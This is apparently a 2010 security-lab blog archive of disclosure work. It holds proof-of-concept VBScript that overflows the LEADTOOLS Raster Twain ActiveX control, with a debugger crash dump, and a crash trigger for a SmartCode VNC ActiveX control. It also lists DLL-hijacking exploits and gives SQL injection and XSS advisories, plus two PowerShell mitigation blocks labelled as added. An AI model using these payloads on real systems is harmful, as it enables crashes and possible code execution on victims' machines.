Archive for August, 2010

LEADTOOLS ActiveX Raster Twain v16.5 (LtocxTwainu.dll) Remote Buffer Overflow PoC

Vendor: LEAD Technologies, Inc.
Product Web Page: http://www.leadtools.com
Affected Version: 16.5.0.2

Summary: With LEADTOOLS you can control any scanner, digital camera
or capture card that has a TWAIN (32 and 64 bit) device driver.
High-level acquisition support is included for ease of use while
low-level functionality is provided for flexibility and control in
even the most demanding scanning applications.

Desc: The Raster Twain Object Library suffers from a buffer overflow
vulnerability because it fails to check the boundary of the user input.

Tested On: Microsoft Windows XP Professional SP3 (EN)
Windows Internet Explorer 8.0.6001.18702
RFgen Mobile Development Studio 4.0.0.06 (Enterprise)

===============================================================

(2c4.2624): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00130041 ebx=100255bc ecx=01649000 edx=00183984 esi=0013ef6c edi=00000000
eip=7c912f4e esp=0013eda8 ebp=0013eda8 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
ntdll!wcscpy+0xe:
7c912f4e 668901          mov     word ptr [ecx],ax        ds:0023:01649000=????
0:000> g
(2c4.2624): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00410039 ebx=00410039 ecx=00150000 edx=00150608 esi=00150000 edi=00410041
eip=7c96c540 esp=0013f220 ebp=0013f228 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
ntdll!RtlpNtMakeTemporaryKey+0x6a74:
7c96c540 807b07ff        cmp     byte ptr [ebx+7],0FFh      ds:0023:00410040=??

==================================================================

Registers:
--------------------------------------------------
EIP 7C912F4E
EAX 00130041
EBX 100255BC -> 10014840 -> Asc: @H@H
ECX 01649000
EDX 001839DC -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EDI 00000000
ESI 0013EF6C -> BAAD0008
EBP 0013EDA8 -> 0013EDDC
ESP 0013EDA8 -> 0013EDDC

EIP 7C96C540
EAX 00410039
EBX 00410039
ECX 00150000 -> 000000C8
EDX 00150608 -> 7C97B5A0
EDI 00410041
ESI 00150000 -> 000000C8
EBP 0013F228 -> 0013F278
ESP 0013F220 -> 00150000

ArgDump:
--------------------------------------------------
EBP+8    016479B0 -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+12    0018238C -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+16    00000000
EBP+20    0013EF6C -> BAAD0008
EBP+24    100255BC -> 10014840 -> Asc: @H@H
EBP+28    0013EDB8 -> 00000000

EBP+8    00150000 -> 000000C8
EBP+12    00410039
EBP+16    7C96DBA4 -> Asc: RtlGetUserInfoHeap
EBP+20    00000000
EBP+24    00410041
EBP+28    7C80FF12 -> 9868146A

CompanyName        LEAD Technologies, Inc.
FileDescription        LEADTOOLS ActiveX Raster Twain (Win32)
FileVersion        16,5,0,2
InternalName        LTRTNU
LegalCopyright        © 1991-2009 LEAD Technologies, Inc.
OriginalFileName        LTRTNU.DLL
ProductName        LEADTOOLS® for Win32
ProductVersion        16.5.0.0

Report for Clsid: {00165752-B1BA-11CE-ABC6-F5B2E79D9E3F}
RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: False

Exception Code: ACCESS_VIOLATION

Disasm: 7C912F4E    MOV [ECX],AX    (ntdll.dll)
Disasm: 7C96C540    CMP BYTE PTR [EBX+7],FF    (ntdll.dll)

Exception Code: BREAKPOINT

Disasm: 7C90120E    INT3    (ntdll.dll)

Seh Chain:
--------------------------------------------------
1     7C839AC0     KERNEL32.dll
2     FC2950         VBSCRIPT.dll
3     7C90E900     ntdll.dll

7C912F4E    MOV [ECX],AX            <-- CRASH
7C96C540    CMP BYTE PTR [EBX+7],FF        <-- CRASH
7C90120F    RETN                <-- CRASH

==================================================================

Vulnerability discovered by Gjoko ‘LiquidWorm’ Krstic
liquidworm gmail com

Zero Science Lab – http://www.zeroscience.mk

24.08.2010

Zero Science Lab Advisory ID: ZSL-2010-4960
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4960.php

PoC:

<object classid='clsid:00165752-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' />
<script language='vbscript'>

targetFile = "C:\Program Files\RFGen40\LtocxTwainu.dll"
prototype  = "Property Let AppName As String"
memberName = "AppName"
progid     = "LTRASTERTWAINLib_U.LEADRasterTwain_U"
argCount   = 1

arg1=String(9236, "A")

target.AppName = arg1

</script>

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4960_pvt.php

Time is on my side

Inspiration: sm, sm@zeroscience.mk
Photography: Ivan Jovanovic aka teppei, iki@zeroscience.mk
Camera Owner: Damjan Arsovski aka Sputnik, damjan@zeroscience.mk
B/W & Finesses: Gjoko Krstic aka LiquidWorm, gjoko@zeroscience.mk

Ref: http://liquidworm.deviantart.com/art/Time-is-on-my-side-by-teppei-176951584

Multiple Vendors DLL Hijacking Exploits

That's right :)

After announcing that he had found some 40 vulnerabilities in Microsoft products, on August 22 H D Moore (Metasploit Project) also published his kit for auditing DLL libraries and their "kidnapping", or hijacking. It is DLLHijackAuditKit v2, which checks every extension registered on your system together with its associated libraries, and exploits them as well. The kit is simple to use: the audit takes 15-30 minutes, after which exploit code is generated in the Exploits folder, which you can use for whatever purpose you like :)

More: http://blog.metasploit.com/2010/08/exploiting-dll-hijacking-flaws.html and http://blog.metasploit.com/2010/08/better-faster-stronger.html.

Naturally, so as not to be left behind, the Zero Science Lab team also audited one of its own laboratory systems and found quite a few vulnerabilities, which follow...

- Adobe Device Central CS5 v3.0.1.0 (dwmapi.dll) DLL Hijacking Exploit

- Adobe Extension Manager CS5 v5.0.298 (dwmapi.dll) DLL Hijacking Exploit

- Adobe ExtendedScript Toolkit CS5 v3.5.0.52 (dwmapi.dll) DLL Hijacking Exploit

- CorelDRAW X3 v13.0.0.576 (crlrib.dll) DLL Hijacking Exploit

- Corel PHOTO-PAINT X3 v13.0.0.576 (crlrib.dll) DLL Hijacking Exploit

- Google Earth v5.1.3535.3218 (quserex.dll) DLL Hijacking Exploit

- Media Player Classic 6.4.9.1 (iacenc.dll) DLL Hijacking Exploit

- Microsoft Office PowerPoint 2007 v12.0.4518 (pp4x322.dll) DLL Hijacking Exploit

- Nullsoft Winamp 5.581 (wnaspi32.dll) DLL Hijacking Exploit

- Microsoft Visio 2010 v14.0.4514.1004 (dwmapi.dll) DLL Hijacking Exploit

After the DLL Hijack Audit Kit v2 was released, more than a hundred exploits were published around the world within a few days, and Microsoft reacted immediately by releasing a tool that works around these weaknesses.

Source: http://www.computerworld.com/s/article/9181518/Microsoft_releases_tool_to_block_DLL_load_hijacking_attacks?taxonomyId=17&pageNumber=1

You can download the tool from the following link: http://support.microsoft.com/kb/2264107 (requirement: a genuine operating system)

Exploits like these are still being published as you read this, and it is alarming. Be careful about who you download files from, and stay safe.

So far, the fastest place to follow publication of these exploits is Exploit-DB: http://www.exploit-db.com/local/

Zero Science Lab
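The Microsoft tool linked above works by installing a new registry value, CWDIllegalInDllSearch, that tells the loader to skip the current working directory. The following PowerShell is an added example, not part of the original post or of Microsoft's tool: it reads that value (system-wide and, optionally, the per-application override under Image File Execution Options), explains what each setting means, and applies a chosen level. It assumes the update from KB2264107 is installed, since the value is ignored otherwise, and an elevated session; winamp.exe is used only as an illustration from the list above.

```powershell
# Added example (not from the post): audit and apply the KB2264107 mitigation.
# Assumes the update from that KB is installed and an elevated PowerShell session.

$SessionMgr = 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager'
$Ifeo       = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'

# Meaning of CWDIllegalInDllSearch as documented in KB2264107, keyed by the
# value's hex form (a REG_DWORD of 0xFFFFFFFF reads back as the Int32 -1).
$Meaning = @{
    '00000000' = 'default search order: the current working directory (CWD) is searched'
    '00000001' = 'CWD skipped when it is a WebDAV folder'
    '00000002' = 'CWD skipped when it is a remote folder (UNC share or WebDAV)'
    'FFFFFFFF' = 'CWD removed from the DLL search order entirely'
}

function Describe-CwdSetting([object]$Value) {
    if ($null -eq $Value) { return 'absent (behaves like 0)' }
    $hex  = '{0:X8}' -f [int]$Value
    $text = $Meaning[$hex]
    if (-not $text) { $text = 'unrecognised value' }
    return "0x$hex = $text"
}

function Get-CwdIllegalInDllSearch([string]$Exe) {
    $sys = Get-ItemProperty -Path $SessionMgr -ErrorAction SilentlyContinue
    $out = @{
        # SafeDllSearchMode is the older control: absent means enabled on XP SP2 and later
        SafeDllSearchMode     = if ($null -eq $sys.SafeDllSearchMode) { 'absent (defaults to 1, enabled)' } else { $sys.SafeDllSearchMode }
        CWDIllegalInDllSearch = Describe-CwdSetting $sys.CWDIllegalInDllSearch
    }
    if ($Exe) {   # per-application override takes precedence over the system-wide value
        $app = Get-ItemProperty -Path "$Ifeo\$Exe" -ErrorAction SilentlyContinue
        $out["PerApp($Exe)"] = Describe-CwdSetting $app.CWDIllegalInDllSearch
    }
    New-Object PSObject -Property $out
}

function Set-CwdIllegalInDllSearch([int]$Value = 2, [string]$Exe) {
    if (@(1, 2, -1) -notcontains $Value) { throw 'Use 1, 2 or -1 (stored as 0xFFFFFFFF)' }
    $path = if ($Exe) { "$Ifeo\$Exe" } else { $SessionMgr }
    if (-not (Test-Path $path)) { New-Item -Path $path -Force | Out-Null }
    Set-ItemProperty -Path $path -Name CWDIllegalInDllSearch -Value $Value -Type DWord
}

Get-CwdIllegalInDllSearch -Exe 'winamp.exe'   # one of the applications listed above
Set-CwdIllegalInDllSearch -Value 2            # block CWD DLL loads from remote folders system-wide
Get-CwdIllegalInDllSearch
```

Level 2 is the setting Microsoft recommends as the safe default; -1 (0xFFFFFFFF) is stricter but can break applications that legitimately load DLLs from their working directory, so test it per application with -Exe first.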

Sports Accelerator Suite v2.0 (news_id) Remote SQL Injection Vulnerability

Vendor: Athlete Web Services, Inc. / AWS Sports
Product Web Page: http://www.athletewebservices.com

Summary: Content Management System (PHP+MySQL).

Description: The CMS is vulnerable to an SQL Injection attack when input is passed to the "news_id" parameter. The script fails to properly sanitize the input before it is returned to the user, allowing the attacker to compromise the entire DB system and view sensitive information.

Details: http://www.zeroscience.mk/mk/vulnerabilities/ZSL-2010-4949.php

SmartCode ServerX VNC Server ActiveX 1.1.5.0 (scvncsrvx.dll) DoS Exploit

The vulnerability exists in the CSC_ServerXControl class and affects all of its members. When an overly long string is parsed while the control is listening for an incoming connection, the application crashes along with IE, corrupting memory.

PoC:

<html>
<object classid='clsid:8818CF4D-2190-49C3-B7EB-B9F2AE198CB1' id='zsl' />
<script language='vbscript'>

dos=String(18212, "A")

zsl.Password = dos

</script>
</html>

http://www.zeroscience.mk/mk/vulnerabilities/ZSL-2010-4948.php
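Both ActiveX advisories on this page (LEADTOOLS Raster Twain above and SmartCode ServerX here) hinge on the control being marked safe for scripting, which is what lets a web page instantiate it and hand it the long string. The PowerShell below is an added example, not code from either advisory: it reproduces the "Safe for Script" / "Safe for Init" check reported in the LEADTOOLS crash report by looking for the standard component-category keys under the CLSID, and then sets the Internet Explorer kill bit so the control can no longer be loaded from a web page. It assumes an elevated session; the category GUIDs and the 0x400 Compatibility Flags value are the standard Windows ones and are not taken from the page.

```powershell
# Added example (not from either advisory): reproduce the "Safe for Script/Init"
# check for a CLSID, then set the Internet Explorer kill bit. Elevated session assumed.

$CatSafeForScripting    = '{7DD95801-9882-11CF-9FA9-00AA006C42C4}'  # CATID_SafeForScripting
$CatSafeForInitializing = '{7DD95802-9882-11CF-9FA9-00AA006C42C4}'  # CATID_SafeForInitializing
$KillBit    = 0x400   # "Compatibility Flags" bit that stops IE from loading the control
$CompatRoot = 'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility'

function Get-ActiveXSafety([string]$Clsid) {
    $base   = "Registry::HKEY_CLASSES_ROOT\CLSID\$Clsid"
    $cats   = "$base\Implemented Categories"
    $server = (Get-ItemProperty -Path "$base\InprocServer32" -ErrorAction SilentlyContinue).'(default)'
    $flags  = (Get-ItemProperty -Path "$CompatRoot\$Clsid" -Name 'Compatibility Flags' -ErrorAction SilentlyContinue).'Compatibility Flags'
    New-Object PSObject -Property @{
        Clsid         = $Clsid
        Registered    = Test-Path $base
        Server        = $server                                    # DLL that implements the control
        SafeForScript = Test-Path "$cats\$CatSafeForScripting"     # "RegKey Safe for Script" in the report
        SafeForInit   = Test-Path "$cats\$CatSafeForInitializing"  # "RegKey Safe for Init" in the report
        KillBitSet    = (([int]$flags -band $KillBit) -ne 0)
    }
}

function Set-ActiveXKillBit([string]$Clsid) {
    $key = "$CompatRoot\$Clsid"
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    $flags = (Get-ItemProperty -Path $key -Name 'Compatibility Flags' -ErrorAction SilentlyContinue).'Compatibility Flags'
    # OR the bit in so that any flags already present are preserved
    Set-ItemProperty -Path $key -Name 'Compatibility Flags' -Value ([int]$flags -bor $KillBit) -Type DWord
}

# The two CLSIDs from the ActiveX advisories on this page
$clsids = @(
    '{00165752-B1BA-11CE-ABC6-F5B2E79D9E3F}'   # LEADTOOLS ActiveX Raster Twain
    '{8818CF4D-2190-49C3-B7EB-B9F2AE198CB1}'   # SmartCode ServerX VNC Server
)
foreach ($c in $clsids) {
    $state = Get-ActiveXSafety $c
    if ($state.Registered -and -not $state.KillBitSet) { Set-ActiveXKillBit $c }
    Get-ActiveXSafety $c | Format-List Clsid, Server, SafeForScript, SafeForInit, KillBitSet
}
```

On 64-bit Windows a 32-bit control is registered under the Wow6432Node views of both HKCR\CLSID and the ActiveX Compatibility key, so run the same checks against those paths as well.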

Information Gathering With Google (cOcOn International Security Conference)

c0c0n, previously known as Cyber Safe, is an annual event conducted as part of the International Information Security Day. The Information Security Research Association, along with the Matriux Security Community, is organizing a two-day International Security and Hacking Conference titled c0c0n 2010 as part of Information Security Day 2010. The event is supported by the Kochi City Police. Various technical, non-technical, legal and community events are organized as part of the program. c0c0n 2010 is scheduled for 05 and 06 Aug 2010.

The number of digital security incidents and cyber crimes is increasing daily at a proportionate rate. The industry is demanding more and more security professionals and controls to curb this never-ending threat to information systems.

c0c0n is aimed at providing a platform to discuss, showcase, educate, understand and spread awareness on the latest trends in information, cyber and hi-tech crimes. It also aims to provide a hand-shaking platform for various corporate, government organizations including the various investigation agencies, academia, research organizations and other industry leaders and players for better co-ordination in making the cyber world a better and safe place to be.

Yet another talk by Maximiliano Soler, held on the 5th and 6th of August 2010 in Kochi, India. In his presentation, Recoleccion de Informacion con Google (OWASP Argentina), Maxi wonderfully describes the various techniques of using Google search to gather sensitive information when conducting penetration tests.

For more details about the c0c0n conference and speakers visit http://www.informationsecurityday.com/c0c0n/, speakers: http://www.informationsecurityday.com/c0c0n/speakers.html

t00t Maxi ;)

Team Johnlong RaidenTunes 2.1.1 Remote Cross-Site Scripting Vulnerability

RaidenTunes 2.1.1 suffers from a Cross-Site Scripting (XSS) vulnerability caused by improper validation of user-supplied input by the music_out.php script through the "p" parameter. A remote attacker could exploit this vulnerability to execute script in a victim's Web browser within the security context of the hosting Web site, allowing the attacker to steal the victim's cookie-based authentication credentials.

Details: http://www.zeroscience.mk/mk/vulnerabilities/ZSL-2010-4947.php

Vendor: http://forum.raidenftpd.com/showflat.php?Cat=&Board=mp3&Number=51265&page=0&view=collapsed&sb=5&o=0&fpart=